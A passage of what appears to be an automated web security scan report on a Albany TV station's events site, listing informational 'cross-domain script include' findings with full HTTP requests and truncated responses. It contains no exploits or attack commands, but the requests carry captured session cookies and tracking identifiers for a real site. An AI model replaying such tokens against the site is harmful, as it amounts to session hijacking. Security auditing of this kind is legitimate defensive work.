Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 29
ETag: "500908d34a55fb0526e9f133a76d7c1f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 42191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.174. http://events.cbs6albany.com/albany-ny/tickets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/tickets

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/tickets HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:36:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 23
ETag: "373be00384458d0a6f31fe7d8b0c3dc7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:36:11 GMT; HttpOnly
Content-Length: 37962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Find tickets to events, concerts, sporting events, performing arts theatre and movie tickets on Zvents." />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.175. http://events.cbs6albany.com/albany-ny/venues

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/venues HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 29
ETag: "fb0402ec7459acfc99753521499dddc1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 34111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.176. http://events.cbs6albany.com/albany-ny/venues/show/182888-the-egg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues/show/182888-the-egg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/venues/show/182888-the-egg HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 470
ETag: "3b4f2106bc014ab68877465013f619f6"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:10 GMT; HttpOnly
Content-Length: 47931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.177. http://events.cbs6albany.com/albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 86
ETag: "264dd00bdd3a49bb59103e1168b63816"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 64071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.178. http://events.cbs6albany.com/albany-ny/venues/show/47192-palace-theatre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues/show/47192-palace-theatre

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/venues/show/47192-palace-theatre HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "eb20606195bf56541c9b1102da067189"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:09 GMT; HttpOnly
Content-Length: 70358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.179. http://events.cbs6albany.com/albany-ny/venues/show/932464-times-union-center

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues/show/932464-times-union-center

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/venues/show/932464-times-union-center HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 74
ETag: "85e3a3ad8f5440ce88789bd8cb915d88"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:10 GMT; HttpOnly
Content-Length: 59813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.180. http://events.cbs6albany.com/clifton-park-ny/events/show/164180885-mac-miller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /clifton-park-ny/events/show/164180885-mac-miller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clifton-park-ny/events/show/164180885-mac-miller HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
